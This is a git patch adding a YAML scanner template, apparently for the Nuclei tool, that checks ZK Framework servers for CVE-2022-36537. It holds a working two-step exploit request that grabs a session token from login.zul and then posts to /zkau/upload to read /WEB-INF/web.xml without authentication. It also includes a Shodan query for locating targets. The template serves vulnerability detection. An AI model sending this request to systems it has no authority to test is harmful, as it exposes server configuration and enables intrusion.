From 3321d8d6f521d02d7ae2c73f28b6d58c200a07da Mon Sep 17 00:00:00 2001 From: Aman Rawat Date: Sat, 14 Jan 2023 20:58:35 +0530 Subject: [PATCH] Added template for CVE-2022-36537 --- cves/2022/CVE-2022-36537.yaml | 64 +++++++++++++++++++++++++++++++++++ 1 file changed, 64 insertions(+) create mode 100644 cves/2022/CVE-2022-36537.yaml diff --git a/cves/2022/CVE-2022-36537.yaml b/cves/2022/CVE-2022-36537.yaml new file mode 100644 index 0000000000..1c16c5e365 --- /dev/null +++ b/cves/2022/CVE-2022-36537.yaml @@ -0,0 +1,64 @@ +id: CVE-2022-36537 + +info: + name: ZK Framework v9.6.1, 9.6.0.1, 9.5.1.3, 9.0.1.2 and 8.6.4.1 - Sensitive Information Disclosure + author: theamanrawat + severity: high + description: | + ZK Framework v9.6.1, 9.6.0.1, 9.5.1.3, 9.0.1.2 and 8.6.4.1 allows attackers to access sensitive information via a crafted POST request sent to the component AuUploader. + reference: + - https://github.com/Malwareman007/CVE-2022-36537/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-36537 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-36537 + cwe-id: CWE-200 + metadata: + verified: "true" + shodan-query: http.title:"Server backup manager" + tags: cve,cve2022,sensitive-information,unauth,zk-framework + +requests: + - raw: + - | + GET /login.zul HTTP/1.1 + Host: {{Hostname}} + + - | + POST /zkau/upload?uuid=101010&dtid={{dtid}}&sid=0&maxsize=-1 HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip, deflate + Accept: */* + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCs6yB0zvpfSBbYEp + Content-Length: 154 + + ------WebKitFormBoundaryCs6yB0zvpfSBbYEp + Content-Disposition: form-data; name="nextURI" + + /WEB-INF/web.xml + ------WebKitFormBoundaryCs6yB0zvpfSBbYEp-- + + req-condition: true + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body_2 + words: + - "display-name" + - "xml version" + - "web-app" + condition: and + + - type: status + status: + - 200 + + extractors: + - type: regex + name: dtid + group: 1 + regex: + - "dt:'(.*?)',cu:" + internal: true